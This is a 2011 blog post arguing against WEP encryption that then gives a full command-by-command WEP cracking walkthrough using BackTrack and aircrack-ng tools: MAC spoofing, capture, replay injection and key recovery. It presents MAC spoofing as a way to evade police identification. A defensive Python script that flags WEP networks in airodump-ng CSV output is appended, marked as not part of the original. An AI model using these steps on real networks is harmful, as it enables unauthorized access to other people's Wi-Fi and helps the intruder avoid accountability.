Thursday, July 7, 2011

Why not to use a WEP Password.

Have you noticed your internet speeds declining? Is your WiFi light flashing with a large amount of activity when no one is using it? Your router may have been hacked. If you are using WEP encryption, you are virtually defenseless against attacks. Unfortunately, some ISPs still give out routers that only have WEP!
If your router does not allow for other encryption (WPA, WPA2), then there is even more sad news: your router could most likely be hacked in minutes. If you have a router like this, BUY A NEW ONE. I wouldn't say that if I really didn't mean it. A new Cisco router may go for 50 dollars, but you will be that much more secure. To show, though, how easy it is to break WEP encryption, I will go ahead and demonstrate.

Now, one tool used often by hackers is an operating system called BackTrack. The pluses are that 1) you don't have to reinstall your operating system, as it can run live off the CD, and 2) it has almost all drivers for WiFi cards built in, so there is no need to install anything: just put the CD in and run it!

The first step a hacker would take is to "spoof" his MAC address. A MAC address is a hexadecimal number (meaning it uses the digits 0-9 and A-F) that is unique to your WiFi card. When you spoof it, you make any router or computer think your MAC is whatever you want it to be. Your MAC could actually be A5:44:3D:0F:DD, but if you spoofed it you could make it, say, 00:11:22:33:44:55. What is the reasoning behind this? Let's say the WiFi hacker forgot to spoof his MAC. If the police came knocking at his door with a warrant for his computer, they could easily identify the MAC address by looking at the card. WiFi hacking is illegal, so you could easily press charges against the hacker. A spoofed MAC, though, would not match the real one, so no one would know "whodunnit." Remember though, the information below is to be used on YOUR OWN ROUTER TO SEE IF
To spoof your MAC address in BackTrack, you would use the following commands.
First, find out your WiFi card's name with the console:
airmon-ng
A list of wireless interfaces will come up. Mine is named wlan0, so from now on replace wlan0 with your wireless card's name.
Now let's shut down all interfaces on the wireless card:
airmon-ng stop wlan0
ifconfig wlan0 down

Then spoof your MAC address (macchanger needs the interface name as its last argument):
macchanger --mac 00:11:22:33:44:55 wlan0
Then turn monitor mode back on:
airmon-ng start wlan0

Now you may begin searching for your router. Use the command:
airodump-ng wlan0
A screen like this should come up:
Find your router's BSSID (i.e. its MAC address) and copy it. Also note your router's channel.
Now use the following command to begin collecting data:
airodump-ng -c channel -w filename --bssid MAC wlan0
Replace channel with your router's channel number, filename with a filename for your data, MAC with the router's BSSID/MAC address, and wlan0 with your WiFi card's name.

OK, so on this screen you should notice somewhere that it says #Data with a number below it. This is a rough count of how many data packets you have collected, with IVs. The IVs are what let you recover the password!
Now let's open another console and use the command:
aireplay-ng -1 0 -a ROUTERSBSSID -h 00:11:22:33:44:55 wlan0

When successful, you will get a screen like this:

Replace ROUTERSBSSID with the router's MAC address and wlan0 with the WiFi card name.

Now run one more aireplay command:
aireplay-ng -3 -b ROUTERSBSSID -h 00:11:22:33:44:55 wlan0

Make the same replacements as in the command above.

When done successfully, you will see a screen like this and your #Data column will climb fast.

OK, now time for the final step! Actually cracking the password. When you have enough #Data (you should gain at least 10000 IVs), stop the aireplay console by selecting that console and pressing CTRL+C. Now open a new console and type in the last command:
aircrack-ng filename-01.cap
Remember that filename you gave the airodump-ng command? Use that as the filename, and yes, you do need the -01.cap at the end! It will begin cracking; if it does not work, it will say something like "Failed. Next try with 15000 IVs." Redo the aireplay-ng steps until you get that much #Data. When it successfully cracks it, it should show a screen like:
This means your router is unsafe, and you need to change to a WPA/WPA2 password. As stated before, if your router does not have this setting, BUY A NEW ONE... unless you don't mind giving anyone around you access to your internet connection. This may seem long, but done by someone with experience, it can be done in less than 5 minutes!
Remember, use WPA/WPA2 and stay safe everyone.
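As an added example (not part of the original post), here is a small Python script that reads the filename-01.csv that airodump-ng writes next to the .cap file and flags any access point still on WEP or running with no encryption, so you can check your own router's setting and its IV count without going any further. The column layout is assumed from airodump-ng's CSV output, and the rows below are constructed sample data.

```python
import csv
import io

# Constructed sample in the column layout airodump-ng writes to filename-01.csv.
# The layout is assumed from the tool's CSV output; the values are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2011-07-07 10:00:00, 2011-07-07 10:05:00,  6,  54, WEP , WEP, OPN, -40,     120,     3042,   0.  0.  0.  0,   6, OldBox, 
AA:BB:CC:DD:EE:01, 2011-07-07 10:00:00, 2011-07-07 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,      98,        0,   0.  0.  0.  0,   8, HomeNet2, 
AA:BB:CC:DD:EE:02, 2011-07-07 10:00:00, 2011-07-07 10:05:00,  1,  54, OPN ,     ,    , -70,      30,        0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2011-07-07 10:01:00, 2011-07-07 10:04:00, -60,      512, 00:11:22:33:44:55, 
"""


def parse_access_points(text):
    """Return one dict per access point from the first table of the CSV
    (everything before the blank line that starts the 'Station MAC' table)."""
    ap_section = text.split("\n\n", 1)[0]
    reader = csv.reader(io.StringIO(ap_section), skipinitialspace=True)
    rows = [[cell.strip() for cell in row] for row in reader if row]
    header, body = rows[0], rows[1:]
    return [dict(zip(header, row)) for row in body]


def audit(text):
    """Flag WEP and open access points. The '# IV' column is the same count the
    #Data column tracks on airodump-ng's live screen; a rising count on your
    own WEP router is the symptom the post describes."""
    findings = []
    for ap in parse_access_points(text):
        privacy = ap["Privacy"].upper()
        if privacy.startswith("WEP"):
            verdict = "WEP: switch to WPA2, or replace the router if it cannot"
        elif privacy == "OPN":
            verdict = "open network: enable WPA2"
        else:
            continue  # WPA/WPA2 is what the post recommends; nothing to flag
        findings.append({"bssid": ap["BSSID"], "essid": ap["ESSID"],
                         "channel": int(ap["channel"]), "ivs": int(ap["# IV"]),
                         "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CSV):
        print(f"{f['essid']} ({f['bssid']}, ch {f['channel']}, {f['ivs']} IVs): {f['verdict']}")
```

Point it at your own capture file (for example `audit(open("filename-01.csv").read())`) to confirm your router shows WPA2 rather than WEP.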
